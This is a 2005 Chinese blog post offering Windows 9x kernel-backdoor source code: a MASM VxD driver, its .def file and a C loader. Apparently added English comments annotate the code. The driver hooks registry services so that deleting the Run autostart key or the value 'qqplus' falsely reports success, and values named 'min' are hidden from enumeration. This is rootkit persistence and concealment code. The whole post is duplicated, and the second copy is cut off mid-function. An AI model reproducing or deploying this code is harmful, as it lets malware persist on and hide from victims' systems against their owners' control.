win9x内核后门开发技术之注册表保护
2005-06-11 22:56
作者:czy
www.chinansl.com/czy/reg.rar
驱动加载文件代码在最后
win9x内核后门开发技术之注册表保护
czy82于03.06
;在f-king这儿第一次发出来,其实在隐藏注册表键值这儿还是有小问题
;注册表保护操作,隐藏注册表键值,保护特殊键值,主键不被删除
;开发环境98ddk,masm6.1
.386p
.XLIST
INCLUDE VMM.Inc
INCLUDE ../../inc/win98/vwin32.inc
include ../../inc/win98/vmmreg.inc
INCLUDE Shell.Inc
.LIST
;VxD declaration: device name REG, version 1.0, control procedure VxD_Control,
;no assigned device ID and no fixed initialisation order.
Declare_Virtual_Device REG,1,0,VxD_Control,Undefined_Device_ID,UNDEFINED_INIT_ORDER
;Locked data. The three RealReg* dwords are the names passed as the hook_proc
;argument of the BeginProc lines below; the hook procedures jump or call
;through them to reach the original registry service.
VxD_LOCKED_DATA_SEG
RealRegDELKey dd 0
RealRegDELvalue dd 0
RealRegEnumvalue dd 0
;pPrevHookEnumKey is not referenced by any code visible on this page.
pPrevHookEnumKey dd 0
;Scratch slots used by HookRegEnumvalue: saved name-buffer pointer, saved
;caller return address, saved status of the real service. They are single
;globals shared by every call that goes through the hook.
szvalue dd 0h
RetAddr dd 0h
Retvalue dd 0h
VxD_LOCKED_DATA_ENDS
VxD_PAGEABLE_DATA_SEG
;MsgTitle and open are not referenced by any code visible on this page.
MsgTitle db "VxD MessageBox",0
open db "open this key",0
;PathName and valueName are the strings the two delete hooks compare against.
;For triage they are this sample's indicators: an autostart (Run) key path and
;the value name "qqplus".
PathName db "Software/Microsoft/Windows/CurrentVersion/Run",0
valueName db "qqplus",0
;openpath and sKeyNameForEnum are not referenced by any code visible on this page.
openpath db 0
sKeyNameForEnum db "czy",0
VxD_PAGEABLE_DATA_ENDS
VxD_CODE_SEG
;System control procedure: routes W32_DEVICEIOCONTROL messages to VxD_IOCTL.
;Every other control message falls through to clc/ret.
BeginProc VxD_Control
Control_Dispatch W32_DEVICEIOCONTROL,VxD_IOCTL
clc ;carry clear on return
ret
EndProc VxD_Control
;Hook procedure installed on the _RegDeleteKey service by VxD_IOCTL.
;Arguments: hkey (declared but never read here), lpszSubKey (sub-key name pointer).
;If lpszSubKey equals PathName (case-insensitive compare) the original service
;is not called and the hook returns with EAX = 0, so the caller is told the
;delete succeeded although nothing was deleted. Any other sub-key is handed to
;the original service through RealRegDELKey.
;Defensive note: a delete that reports success while the key is still present
;is an observable symptom of this kind of hook.
BeginProc HookRegDELKey, service, hook_proc, RealRegDELKey, locked
ArgVar hkey, DWORD
ArgVar lpszSubKey, DWORD
EnterProc
VMMCall _lstrcmpi, <OFFSET32 PathName, dword ptr [lpszSubKey]>
cmp eax, 0 ;0 = the two strings are equal
jne @@notmykey
LeaveProc ;EAX still holds the 0 returned by _lstrcmpi
Return
@@notmykey:
LeaveProc
jmp [RealRegDELKey] ;tail-jump: the original service returns directly to the caller
Return ;not reached, it follows an unconditional jmp
EndProc HookRegDELKey
;Hook procedure installed on the _RegDeletevalue service by VxD_IOCTL.
;Arguments: hkey (declared but never read here), lpszvalue (value name pointer).
;If lpszvalue equals valueName ("qqplus", case-insensitive compare) the original
;service is not called and the hook returns with EAX = 0, so the caller is told
;the value was deleted although it was not. Any other value name is handed to
;the original service through RealRegDELvalue.
;Because hkey is not examined, the name is matched under every key.
BeginProc HookRegDELvalue, service, hook_proc, RealRegDELvalue, locked
ArgVar hkey, DWORD
ArgVar lpszvalue, DWORD
EnterProc
VMMCall _lstrcmpi, <OFFSET32 valueName, dword ptr [lpszvalue]>
cmp eax, 0 ;0 = the two strings are equal
jne @@notmyvalue
LeaveProc ;EAX still holds the 0 returned by _lstrcmpi
Return
@@notmyvalue:
LeaveProc
jmp [RealRegDELvalue] ;tail-jump: the original service returns directly to the caller
Return ;not reached, it follows an unconditional jmp
EndProc HookRegDELvalue
;---------------------------------
;Hook procedure installed on the _RegEnumvalue service by VxD_IOCTL. Its stated
;purpose on this page is to hide a registry value from enumeration.
;Flow: remember the caller's name buffer, replace the return address on the
;stack with @@checkit so the original service returns here first, then inspect
;the name the original service wrote.
;Defensive note: only the enumeration service is filtered. A view of the
;registry taken without this service (for example the registry files read
;offline) still contains the value, so comparing the two views exposes it.
;NOTE(review): the page's author states that value hiding "still has a small
;problem"; do not assume the @@hide path behaves reliably.
BeginProc HookRegEnumvalue, service, hook_proc, RealRegEnumvalue, locked
ArgVar hkey, DWORD
ArgVar ivalue, DWORD
ArgVar lpszvalue,DWORD
ArgVar lpcbvalueName,DWORD
ArgVar lpdwReserved,DWORD
ArgVar lpdwType,DWORD
ArgVar lpbData,DWORD
ArgVar lpcbData,DWORD
EnterProc
mov eax,lpszvalue
mov szvalue,eax ;keep the pointer to the caller's value-name buffer
LeaveProc
mov eax,[esp]
mov RetAddr,eax ;remember the caller's return address
mov [esp],offset32 @@checkit ;make the original service return to @@checkit
jmp [RealRegEnumvalue]
@@checkit:
push eax
pop Retvalue ;Retvalue = status returned by the original service
mov eax,szvalue ;EAX now holds the name-buffer pointer, not the status
;006e696dh is the little-endian dword 'm','i','n',0, i.e. the name is exactly "min".
;Original inline note on the next line: hide the value if it is named "min".
cmp dword ptr [eax],006e696dh //键值名叫min则隐藏
jz @@hide
;On the fall-through path EAX is the buffer pointer; when reached from @@hide
;it is the status of the second call.
@@exit: cmp eax,ERROR_NO_MORE_ITEMS
jz @@gonow
cmp Retvalue,ERROR_NO_MORE_ITEMS
jz @@gonow
xor eax,eax ;every other case is reported to the caller as 0
@@gonow:
jmp [RetAddr] ;return to the original caller
@@hide: push eax
EnterProc
inc ivalue ;advance the index argument past the hidden entry
LeaveProc
pop eax
call [RealRegEnumvalue] ;enumerate again with the advanced index
jmp @@exit
EndProc HookRegEnumvalue
;---------------------------------
;W32_DEVICEIOCONTROL handler, dispatched from VxD_Control.
;On entry ESI points to the request structure; only dwIoControlCode is read.
;  code 1 -> hook _RegDeleteKey, _RegEnumvalue and _RegDeletevalue
;  code 2 -> remove the same three hooks
;  other  -> nothing
;Every path ends with EAX = 0 and carry clear. The result of
;Hook_Device_Service / Unhook_Device_Service is never examined, so the
;user-mode caller gets the same answer whether or not a hook was installed.
BeginProc VxD_IOCTL
mov ecx,[esi.dwIoControlCode]
cmp ecx,1
jz Install_hook
cmp ecx,2
jz Uninstall_hook
jmp VxD_IOCTL_Exit
Install_hook:
GetVxdServiceOrdinal eax, _RegDeleteKey ;protect the main key
mov esi, OFFSET32 HookRegDELKey ;ESI is reused here; the request pointer is no longer needed
VMMCall Hook_Device_Service
GetVxdServiceOrdinal eax, _RegEnumvalue
mov esi, OFFSET32 HookRegEnumvalue
VMMCall Hook_Device_Service
;Disabled: a hook on _RegEnumKey. RegEnumKey_Hook is not defined on this page.
;GetVxdServiceOrdinal eax, _RegEnumKey
;mov esi, OFFSET32 RegEnumKey_Hook
;VMMCall Hook_Device_Service
GetVxdServiceOrdinal eax, _RegDeletevalue
mov esi, OFFSET32 HookRegDELvalue
VMMCall Hook_Device_Service
jmp VxD_IOCTL_Exit
Uninstall_hook:
GetVxdServiceOrdinal eax, _RegDeleteKey
mov esi, OFFSET32 HookRegDELKey
VMMCall Unhook_Device_Service
GetVxdServiceOrdinal eax, _RegEnumvalue
mov esi, OFFSET32 HookRegEnumvalue
VMMCall UnHook_Device_Service
;Disabled: removal of the _RegEnumKey hook, matching the disabled install above.
;GetVxdServiceOrdinal eax, _RegEnumKey
;mov esi, OFFSET32 RegEnumKey_Hook
;VMMCall UnHook_Device_Service
GetVxdServiceOrdinal eax, _RegDeletevalue
mov esi, OFFSET32 HookRegDELvalue
VMMCall Unhook_Device_Service
VxD_IOCTL_Exit:
xor eax,eax ;always report 0 to the DeviceIoControl caller
clc
ret
EndProc VxD_IOCTL
VxD_CODE_ENDS
end
;----------------下面是def文件
; Module-definition file for the REG virtual device.
; "VXD REG DYNAMIC" marks the module as a dynamically loadable VxD named REG.
; The SEGMENTS table maps each segment name to a segment class and attributes.
; The single export, REG_DDB, carries the name of the device declared with
; Declare_Virtual_Device REG in the assembly source on this page.
VXD REG DYNAMIC
DESCRIPTION 'register API Hook Program'
SEGMENTS
_LPTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TLS CLASS 'LCODE' PRELOAD NONDISCARDABLE
_BSS CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LMSGTABLE CLASS 'MCODE' PRELOAD NONDISCARDABLE IOPL
_LMSGDATA CLASS 'MCODE' PRELOAD NONDISCARDABLE IOPL
_IMSGTABLE CLASS 'MCODE' PRELOAD DISCARDABLE IOPL
_IMSGDATA CLASS 'MCODE' PRELOAD DISCARDABLE IOPL
_ITEXT CLASS 'ICODE' DISCARDABLE
_IDATA CLASS 'ICODE' DISCARDABLE
_PTEXT CLASS 'PCODE' NONDISCARDABLE
_PMSGTABLE CLASS 'MCODE' NONDISCARDABLE IOPL
_PMSGDATA CLASS 'MCODE' NONDISCARDABLE IOPL
_PDATA CLASS 'PDATA' NONDISCARDABLE SHARED
_STEXT CLASS 'SCODE' RESIDENT
_SDATA CLASS 'SCODE' RESIDENT
_DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_16ICODE CLASS '16ICODE' PRELOAD DISCARDABLE
_RCODE CLASS 'RCODE'
EXPORTS
REG_DDB @1
;-----------------load.exe的代码
#include "tchar.h"
#include "windows.h"
/* Window procedure, defined after WinMain. */
LRESULT CALLBACK WndProc(HWND hWnd, UINT Message, WPARAM wParam, LPARAM lParam);

/*
 * Control codes sent to the driver with DeviceIoControl. The values match the
 * two codes VxD_IOCTL tests for (1 = install hooks, 2 = remove hooks). The
 * names and the window title below mention file-system hooking, but the
 * driver on this page hooks registry services.
 */
#define INSTALL_FILE_SYSTEM_API_HOOK   1
#define UNINSTALL_FILE_SYSTEM_API_HOOK 2

/* Handle to the opened driver; set in WM_CREATE, closed in WM_DESTROY. */
static HANDLE hDevice;

/* Window class name and window/message-box caption. */
static TCHAR szAppName[] = _T("FHTEST");
static TCHAR szAppTitle[] = _T("拦截Windows 95/98文件操作测试程序");
/*
 * Entry point of load.exe. Refuses to run on the Windows NT family, registers
 * the window class on first instance, creates the main window and pumps
 * messages until WM_QUIT. The driver itself is opened and controlled from
 * WndProc, not from here.
 *
 * Returns FALSE on any setup failure, otherwise the wParam of the final
 * message.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpCmdLine, int nCmdShow)
{
    MSG Msg;
    WNDCLASSEX wndClass;
    HWND hMainWnd;

    /* GetVersion() has its high bit clear on Windows NT; VxDs exist only on
       Windows 95/98, so stop here on NT. */
    if (0x80000000 > GetVersion()) {
        MessageBox(NULL, _T("本程序不能在Windows NT中运行!"), szAppTitle,
                   MB_ICONINFORMATION|MB_OK);
        return FALSE;
    }

    if (hPrevInstance == NULL) {
        wndClass.cbSize = sizeof(WNDCLASSEX);
        wndClass.style = CS_HREDRAW|CS_VREDRAW;
        wndClass.lpfnWndProc = WndProc;
        wndClass.cbClsExtra = 0;
        wndClass.cbWndExtra = 0;
        wndClass.hInstance = hInstance;
        wndClass.hIcon = LoadIcon(hInstance, IDI_APPLICATION);
        wndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
        wndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
        wndClass.lpszMenuName = NULL;
        wndClass.lpszClassName = szAppName;
        wndClass.hIconSm = LoadIcon(hInstance, IDI_APPLICATION);
        if (RegisterClassEx(&wndClass) == 0) {
            return FALSE;
        }
    }

    hMainWnd = CreateWindow(szAppName, szAppTitle, WS_OVERLAPPEDWINDOW,
                            CW_USEDEFAULT, CW_USEDEFAULT,
                            CW_USEDEFAULT, CW_USEDEFAULT,
                            0, 0, hInstance, NULL);
    if (hMainWnd == NULL) {
        return FALSE;
    }

    ShowWindow(hMainWnd, nCmdShow);
    UpdateWindow(hMainWnd);

    /* Standard message pump; ends when GetMessage returns 0 (WM_QUIT). */
    for (;;) {
        if (!GetMessage(&Msg, 0, 0, 0)) {
            break;
        }
        TranslateMessage(&Msg);
        DispatchMessage(&Msg);
    }
    return Msg.wParam;
}
/*
 * Window procedure of the loader.
 *
 * WM_CREATE  - opens the driver with CreateFile (FILE_FLAG_DELETE_ON_CLOSE)
 *              and sends control code INSTALL_FILE_SYSTEM_API_HOOK.
 * WM_PAINT   - validates the window; nothing is drawn.
 * WM_DESTROY - sends UNINSTALL_FILE_SYSTEM_API_HOOK, closes the handle and
 *              posts WM_QUIT.
 * Everything else goes to DefWindowProc.
 *
 * The message boxes speak of a "file system API hook"; the driver on this
 * page hooks registry services. VxD_IOCTL returns 0 on every path, so a
 * "success" box here does not prove that any hook was installed or removed.
 * The device path string is reproduced exactly as printed on the page.
 */
LRESULT CALLBACK WndProc(HWND hWnd, UINT Message, WPARAM wParam, LPARAM lParam)
{
    PAINTSTRUCT ps;
    DWORD cb;
    BOOL bResult;

    if (Message == WM_CREATE) {
        hDevice = CreateFile("////.//REG.VXD", 0, 0, NULL, 0,
                             FILE_FLAG_DELETE_ON_CLOSE, NULL);
        if (hDevice == INVALID_HANDLE_VALUE) {
            MessageBox(hWnd, _T("不能打开REG.VXD!"), szAppTitle,
                       MB_ICONINFORMATION|MB_OK);
            return 0;
        }
        bResult = DeviceIoControl(hDevice, INSTALL_FILE_SYSTEM_API_HOOK,
                                  NULL, 0, NULL, 0, &cb, 0);
        if (bResult) {
            MessageBox(hWnd, _T("文件系统API 钩子安装成功!"), szAppTitle,
                       MB_ICONINFORMATION|MB_OK);
        } else {
            MessageBox(hWnd, _T("不能安装文件系统API 钩子!"), szAppTitle,
                       MB_ICONINFORMATION|MB_OK);
        }
        return 0;
    }

    if (Message == WM_PAINT) {
        /* Begin/End pair only validates the update region. */
        BeginPaint(hWnd, &ps);
        EndPaint(hWnd, &ps);
        return 0;
    }

    if (Message == WM_DESTROY) {
        if (hDevice == INVALID_HANDLE_VALUE) {
            MessageBox(hWnd, _T("REG.VXD!"), szAppTitle,
                       MB_ICONINFORMATION|MB_OK);
        } else {
            bResult = DeviceIoControl(hDevice, UNINSTALL_FILE_SYSTEM_API_HOOK,
                                      NULL, 0, NULL, 0, &cb, 0);
            if (bResult) {
                MessageBox(hWnd, _T("文件系统API 钩子移去成功!"), szAppTitle,
                           MB_ICONINFORMATION|MB_OK);
            } else {
                MessageBox(hWnd, _T("不能移去文件系统API 钩子!"), szAppTitle,
                           MB_ICONINFORMATION|MB_OK);
            }
            CloseHandle(hDevice);
        }
        PostQuitMessage(0);
        return 0;
    }

    return DefWindowProc(hWnd, Message, wParam, lParam);
}
www.chinansl.com/czy/reg.rar
驱动加载文件代码在最后
win9x内核后门开发技术之注册表保护
czy82于03.06
;在f-king这儿第一次发出来,其实在隐藏注册表键值这儿还是有小问题
;注册表保护操作,隐藏注册表键值,保护特殊键值,主键不被删除
;开发环境98ddk,masm6.1
.386p
.XLIST
INCLUDE VMM.Inc
INCLUDE ../../inc/win98/vwin32.inc
include ../../inc/win98/vmmreg.inc
INCLUDE Shell.Inc
.LIST
;VxD declaration: device name REG, version 1.0, control procedure VxD_Control,
;no assigned device ID and no fixed initialisation order.
Declare_Virtual_Device REG,1,0,VxD_Control,Undefined_Device_ID,UNDEFINED_INIT_ORDER
;Locked data. The three RealReg* dwords are the names passed as the hook_proc
;argument of the BeginProc lines below; the hook procedures jump or call
;through them to reach the original registry service.
VxD_LOCKED_DATA_SEG
RealRegDELKey dd 0
RealRegDELvalue dd 0
RealRegEnumvalue dd 0
;pPrevHookEnumKey is not referenced by any code visible on this page.
pPrevHookEnumKey dd 0
;Scratch slots used by HookRegEnumvalue: saved name-buffer pointer, saved
;caller return address, saved status of the real service. They are single
;globals shared by every call that goes through the hook.
szvalue dd 0h
RetAddr dd 0h
Retvalue dd 0h
VxD_LOCKED_DATA_ENDS
VxD_PAGEABLE_DATA_SEG
;MsgTitle and open are not referenced by any code visible on this page.
MsgTitle db "VxD MessageBox",0
open db "open this key",0
;PathName and valueName are the strings the two delete hooks compare against.
;For triage they are this sample's indicators: an autostart (Run) key path and
;the value name "qqplus".
PathName db "Software/Microsoft/Windows/CurrentVersion/Run",0
valueName db "qqplus",0
;openpath and sKeyNameForEnum are not referenced by any code visible on this page.
openpath db 0
sKeyNameForEnum db "czy",0
VxD_PAGEABLE_DATA_ENDS
VxD_CODE_SEG
;System control procedure: routes W32_DEVICEIOCONTROL messages to VxD_IOCTL.
;Every other control message falls through to clc/ret.
BeginProc VxD_Control
Control_Dispatch W32_DEVICEIOCONTROL,VxD_IOCTL
clc ;carry clear on return
ret
EndProc VxD_Control
;Hook procedure installed on the _RegDeleteKey service by VxD_IOCTL.
;Arguments: hkey (declared but never read here), lpszSubKey (sub-key name pointer).
;If lpszSubKey equals PathName (case-insensitive compare) the original service
;is not called and the hook returns with EAX = 0, so the caller is told the
;delete succeeded although nothing was deleted. Any other sub-key is handed to
;the original service through RealRegDELKey.
;Defensive note: a delete that reports success while the key is still present
;is an observable symptom of this kind of hook.
BeginProc HookRegDELKey, service, hook_proc, RealRegDELKey, locked
ArgVar hkey, DWORD
ArgVar lpszSubKey, DWORD
EnterProc
VMMCall _lstrcmpi, <OFFSET32 PathName, dword ptr [lpszSubKey]>
cmp eax, 0 ;0 = the two strings are equal
jne @@notmykey
LeaveProc ;EAX still holds the 0 returned by _lstrcmpi
Return
@@notmykey:
LeaveProc
jmp [RealRegDELKey] ;tail-jump: the original service returns directly to the caller
Return ;not reached, it follows an unconditional jmp
EndProc HookRegDELKey
;Hook procedure installed on the _RegDeletevalue service by VxD_IOCTL.
;Arguments: hkey (declared but never read here), lpszvalue (value name pointer).
;If lpszvalue equals valueName ("qqplus", case-insensitive compare) the original
;service is not called and the hook returns with EAX = 0, so the caller is told
;the value was deleted although it was not. Any other value name is handed to
;the original service through RealRegDELvalue.
;Because hkey is not examined, the name is matched under every key.
BeginProc HookRegDELvalue, service, hook_proc, RealRegDELvalue, locked
ArgVar hkey, DWORD
ArgVar lpszvalue, DWORD
EnterProc
VMMCall _lstrcmpi, <OFFSET32 valueName, dword ptr [lpszvalue]>
cmp eax, 0 ;0 = the two strings are equal
jne @@notmyvalue
LeaveProc ;EAX still holds the 0 returned by _lstrcmpi
Return
@@notmyvalue:
LeaveProc
jmp [RealRegDELvalue] ;tail-jump: the original service returns directly to the caller
Return ;not reached, it follows an unconditional jmp
EndProc HookRegDELvalue
;---------------------------------
;Hook procedure installed on the _RegEnumvalue service by VxD_IOCTL. Its stated
;purpose on this page is to hide a registry value from enumeration.
;Flow: remember the caller's name buffer, replace the return address on the
;stack with @@checkit so the original service returns here first, then inspect
;the name the original service wrote.
;Defensive note: only the enumeration service is filtered. A view of the
;registry taken without this service (for example the registry files read
;offline) still contains the value, so comparing the two views exposes it.
;NOTE(review): the page's author states that value hiding "still has a small
;problem"; do not assume the @@hide path behaves reliably.
BeginProc HookRegEnumvalue, service, hook_proc, RealRegEnumvalue, locked
ArgVar hkey, DWORD
ArgVar ivalue, DWORD
ArgVar lpszvalue,DWORD
ArgVar lpcbvalueName,DWORD
ArgVar lpdwReserved,DWORD
ArgVar lpdwType,DWORD
ArgVar lpbData,DWORD
ArgVar lpcbData,DWORD
EnterProc
mov eax,lpszvalue
mov szvalue,eax ;keep the pointer to the caller's value-name buffer
LeaveProc
mov eax,[esp]
mov RetAddr,eax ;remember the caller's return address
mov [esp],offset32 @@checkit ;make the original service return to @@checkit
jmp [RealRegEnumvalue]
@@checkit:
push eax
pop Retvalue ;Retvalue = status returned by the original service
mov eax,szvalue ;EAX now holds the name-buffer pointer, not the status
;006e696dh is the little-endian dword 'm','i','n',0, i.e. the name is exactly "min".
;Original inline note on the next line: hide the value if it is named "min".
cmp dword ptr [eax],006e696dh //键值名叫min则隐藏
jz @@hide
;On the fall-through path EAX is the buffer pointer; when reached from @@hide
;it is the status of the second call.
@@exit: cmp eax,ERROR_NO_MORE_ITEMS
jz @@gonow
cmp Retvalue,ERROR_NO_MORE_ITEMS
jz @@gonow
xor eax,eax ;every other case is reported to the caller as 0
@@gonow:
jmp [RetAddr] ;return to the original caller
@@hide: push eax
EnterProc
inc ivalue ;advance the index argument past the hidden entry
LeaveProc
pop eax
call [RealRegEnumvalue] ;enumerate again with the advanced index
jmp @@exit
EndProc HookRegEnumvalue
;---------------------------------
;W32_DEVICEIOCONTROL handler, dispatched from VxD_Control.
;On entry ESI points to the request structure; only dwIoControlCode is read.
;  code 1 -> hook _RegDeleteKey, _RegEnumvalue and _RegDeletevalue
;  code 2 -> remove the same three hooks
;  other  -> nothing
;Every path ends with EAX = 0 and carry clear. The result of
;Hook_Device_Service / Unhook_Device_Service is never examined, so the
;user-mode caller gets the same answer whether or not a hook was installed.
BeginProc VxD_IOCTL
mov ecx,[esi.dwIoControlCode]
cmp ecx,1
jz Install_hook
cmp ecx,2
jz Uninstall_hook
jmp VxD_IOCTL_Exit
Install_hook:
GetVxdServiceOrdinal eax, _RegDeleteKey ;protect the main key
mov esi, OFFSET32 HookRegDELKey ;ESI is reused here; the request pointer is no longer needed
VMMCall Hook_Device_Service
GetVxdServiceOrdinal eax, _RegEnumvalue
mov esi, OFFSET32 HookRegEnumvalue
VMMCall Hook_Device_Service
;Disabled: a hook on _RegEnumKey. RegEnumKey_Hook is not defined on this page.
;GetVxdServiceOrdinal eax, _RegEnumKey
;mov esi, OFFSET32 RegEnumKey_Hook
;VMMCall Hook_Device_Service
GetVxdServiceOrdinal eax, _RegDeletevalue
mov esi, OFFSET32 HookRegDELvalue
VMMCall Hook_Device_Service
jmp VxD_IOCTL_Exit
Uninstall_hook:
GetVxdServiceOrdinal eax, _RegDeleteKey
mov esi, OFFSET32 HookRegDELKey
VMMCall Unhook_Device_Service
GetVxdServiceOrdinal eax, _RegEnumvalue
mov esi, OFFSET32 HookRegEnumvalue
VMMCall UnHook_Device_Service
;Disabled: removal of the _RegEnumKey hook, matching the disabled install above.
;GetVxdServiceOrdinal eax, _RegEnumKey
;mov esi, OFFSET32 RegEnumKey_Hook
;VMMCall UnHook_Device_Service
GetVxdServiceOrdinal eax, _RegDeletevalue
mov esi, OFFSET32 HookRegDELvalue
VMMCall Unhook_Device_Service
VxD_IOCTL_Exit:
xor eax,eax ;always report 0 to the DeviceIoControl caller
clc
ret
EndProc VxD_IOCTL
VxD_CODE_ENDS
end
;----------------下面是def文件
; Module-definition file for the REG virtual device.
; "VXD REG DYNAMIC" marks the module as a dynamically loadable VxD named REG.
; The SEGMENTS table maps each segment name to a segment class and attributes.
; The single export, REG_DDB, carries the name of the device declared with
; Declare_Virtual_Device REG in the assembly source on this page.
VXD REG DYNAMIC
DESCRIPTION 'register API Hook Program'
SEGMENTS
_LPTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TLS CLASS 'LCODE' PRELOAD NONDISCARDABLE
_BSS CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LMSGTABLE CLASS 'MCODE' PRELOAD NONDISCARDABLE IOPL
_LMSGDATA CLASS 'MCODE' PRELOAD NONDISCARDABLE IOPL
_IMSGTABLE CLASS 'MCODE' PRELOAD DISCARDABLE IOPL
_IMSGDATA CLASS 'MCODE' PRELOAD DISCARDABLE IOPL
_ITEXT CLASS 'ICODE' DISCARDABLE
_IDATA CLASS 'ICODE' DISCARDABLE
_PTEXT CLASS 'PCODE' NONDISCARDABLE
_PMSGTABLE CLASS 'MCODE' NONDISCARDABLE IOPL
_PMSGDATA CLASS 'MCODE' NONDISCARDABLE IOPL
_PDATA CLASS 'PDATA' NONDISCARDABLE SHARED
_STEXT CLASS 'SCODE' RESIDENT
_SDATA CLASS 'SCODE' RESIDENT
_DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_16ICODE CLASS '16ICODE' PRELOAD DISCARDABLE
_RCODE CLASS 'RCODE'
EXPORTS
REG_DDB @1
;-----------------load.exe的代码
#include "tchar.h"
#include "windows.h"
/* Window procedure, defined after WinMain. */
LRESULT CALLBACK WndProc(HWND hWnd, UINT Message, WPARAM wParam, LPARAM lParam);

/*
 * Control codes sent to the driver with DeviceIoControl. The values match the
 * two codes VxD_IOCTL tests for (1 = install hooks, 2 = remove hooks). The
 * names and the window title below mention file-system hooking, but the
 * driver on this page hooks registry services.
 */
#define INSTALL_FILE_SYSTEM_API_HOOK   1
#define UNINSTALL_FILE_SYSTEM_API_HOOK 2

/* Handle to the opened driver; set in WM_CREATE, closed in WM_DESTROY. */
static HANDLE hDevice;

/* Window class name and window/message-box caption. */
static TCHAR szAppName[] = _T("FHTEST");
static TCHAR szAppTitle[] = _T("拦截Windows 95/98文件操作测试程序");
/*
 * Entry point of load.exe. Refuses to run on the Windows NT family, registers
 * the window class on first instance, creates the main window and pumps
 * messages until WM_QUIT. The driver itself is opened and controlled from
 * WndProc, not from here.
 *
 * Returns FALSE on any setup failure, otherwise the wParam of the final
 * message.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpCmdLine, int nCmdShow)
{
    MSG Msg;
    WNDCLASSEX wndClass;
    HWND hMainWnd;

    /* GetVersion() has its high bit clear on Windows NT; VxDs exist only on
       Windows 95/98, so stop here on NT. */
    if (0x80000000 > GetVersion()) {
        MessageBox(NULL, _T("本程序不能在Windows NT中运行!"), szAppTitle,
                   MB_ICONINFORMATION|MB_OK);
        return FALSE;
    }

    if (hPrevInstance == NULL) {
        wndClass.cbSize = sizeof(WNDCLASSEX);
        wndClass.style = CS_HREDRAW|CS_VREDRAW;
        wndClass.lpfnWndProc = WndProc;
        wndClass.cbClsExtra = 0;
        wndClass.cbWndExtra = 0;
        wndClass.hInstance = hInstance;
        wndClass.hIcon = LoadIcon(hInstance, IDI_APPLICATION);
        wndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
        wndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
        wndClass.lpszMenuName = NULL;
        wndClass.lpszClassName = szAppName;
        wndClass.hIconSm = LoadIcon(hInstance, IDI_APPLICATION);
        if (RegisterClassEx(&wndClass) == 0) {
            return FALSE;
        }
    }

    hMainWnd = CreateWindow(szAppName, szAppTitle, WS_OVERLAPPEDWINDOW,
                            CW_USEDEFAULT, CW_USEDEFAULT,
                            CW_USEDEFAULT, CW_USEDEFAULT,
                            0, 0, hInstance, NULL);
    if (hMainWnd == NULL) {
        return FALSE;
    }

    ShowWindow(hMainWnd, nCmdShow);
    UpdateWindow(hMainWnd);

    /* Standard message pump; ends when GetMessage returns 0 (WM_QUIT). */
    for (;;) {
        if (!GetMessage(&Msg, 0, 0, 0)) {
            break;
        }
        TranslateMessage(&Msg);
        DispatchMessage(&Msg);
    }
    return Msg.wParam;
}
/*
 * Window procedure of the loader.
 *
 * WM_CREATE  - opens the driver with CreateFile (FILE_FLAG_DELETE_ON_CLOSE)
 *              and sends control code INSTALL_FILE_SYSTEM_API_HOOK.
 * WM_PAINT   - validates the window; nothing is drawn.
 * WM_DESTROY - sends UNINSTALL_FILE_SYSTEM_API_HOOK, closes the handle and
 *              posts WM_QUIT.
 * Everything else goes to DefWindowProc.
 *
 * The message boxes speak of a "file system API hook"; the driver on this
 * page hooks registry services. VxD_IOCTL returns 0 on every path, so a
 * "success" box here does not prove that any hook was installed or removed.
 * The device path string is reproduced exactly as printed on the page.
 */
LRESULT CALLBACK WndProc(HWND hWnd, UINT Message, WPARAM wParam, LPARAM lParam)
{
    PAINTSTRUCT ps;
    DWORD cb;
    BOOL bResult;

    if (Message == WM_CREATE) {
        hDevice = CreateFile("////.//REG.VXD", 0, 0, NULL, 0,
                             FILE_FLAG_DELETE_ON_CLOSE, NULL);
        if (hDevice == INVALID_HANDLE_VALUE) {
            MessageBox(hWnd, _T("不能打开REG.VXD!"), szAppTitle,
                       MB_ICONINFORMATION|MB_OK);
            return 0;
        }
        bResult = DeviceIoControl(hDevice, INSTALL_FILE_SYSTEM_API_HOOK,
                                  NULL, 0, NULL, 0, &cb, 0);
        if (bResult) {
            MessageBox(hWnd, _T("文件系统API 钩子安装成功!"), szAppTitle,
                       MB_ICONINFORMATION|MB_OK);
        } else {
            MessageBox(hWnd, _T("不能安装文件系统API 钩子!"), szAppTitle,
                       MB_ICONINFORMATION|MB_OK);
        }
        return 0;
    }

    if (Message == WM_PAINT) {
        /* Begin/End pair only validates the update region. */
        BeginPaint(hWnd, &ps);
        EndPaint(hWnd, &ps);
        return 0;
    }

    if (Message == WM_DESTROY) {
        if (hDevice == INVALID_HANDLE_VALUE) {
            MessageBox(hWnd, _T("REG.VXD!"), szAppTitle,
                       MB_ICONINFORMATION|MB_OK);
        } else {
            bResult = DeviceIoControl(hDevice, UNINSTALL_FILE_SYSTEM_API_HOOK,
